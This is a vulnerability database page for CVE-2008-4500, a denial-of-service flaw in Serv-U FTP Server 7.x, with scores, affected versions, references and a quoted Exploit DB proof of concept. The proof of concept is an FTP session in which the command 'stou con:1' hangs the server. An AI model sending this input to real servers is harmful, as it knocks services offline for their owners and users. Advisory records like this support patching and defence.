Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact
4
CVSSv2

CVE-2008-4500

Published: 09/10/2008 Updated: 28/07/2020
CVSS v2 Base Score: 4 | Impact Score: 2.9 | Exploitability Score: 8
VMScore: 405
Vector: AV:N/AC:L/Au:S/C:N/I:N/A:P
Subscribe to Serv-u File Server

Vulnerability Summary

Serv-U 7.0.0.1 up to and including 7.3, including 7.2.0.1, allows remote authenticated users to cause a denial of service (CPU consumption) via a crafted stou command, probably related to MS-DOS device names, as demonstrated using "con:1".

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

solarwinds serv-u file server 7.0.0.2

solarwinds serv-u file server 7.0.0.3

solarwinds serv-u file server 7.3.0.0

solarwinds serv-u file server 7.3.0.1

solarwinds serv-u file server 7.1.0.1

solarwinds serv-u file server 7.1.0.2

solarwinds serv-u file server 7.0.0.1

solarwinds serv-u file server 7.2.0.0

solarwinds serv-u file server 7.2.0.1

solarwinds serv-u file server 7.0.0.4

solarwinds serv-u file server 7.1.0.0

solarwinds serv-u file server 7.3.0.2

Exploits

Exploit DB: RhinoSoft Serv-U FTP Server 7.3 - (Authenticated) 'stou con:1' Denial of Service
#Serv-U <= 7201 / 73 ftp server DoS #user must have upload permissions # #(x) dmnt 2008-10-01 220 Serv-U FTP Server v73 ready user test 331 User name okay, need password pass test 230 User logged in, proceed stou con:1 quit 221 Goodbye, closing session # now server DoS'ed # milw0rmcom [2008-10-03] ...

References

CWE-20http://secunia.com/advisories/32150http://www.securityfocus.com/bid/31556http://securityreason.com/securityalert/4377http://www.vupen.com/english/advisories/2008/2746https://exchange.xforce.ibmcloud.com/vulnerabilities/45652https://www.exploit-db.com/exploits/6660https://nvd.nist.govhttps://www.exploit-db.com/exploits/6660/
CVSSv2
CVSSv2
CVSSv3
VMScore
Recommendations:
CVE-2022-48700CVE-2022-48689CVE-2024-27956CVE-2023-6363SQLNULL pointer dereferenceCVE-2023-41830CVE-2015-2051arbitrary
Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook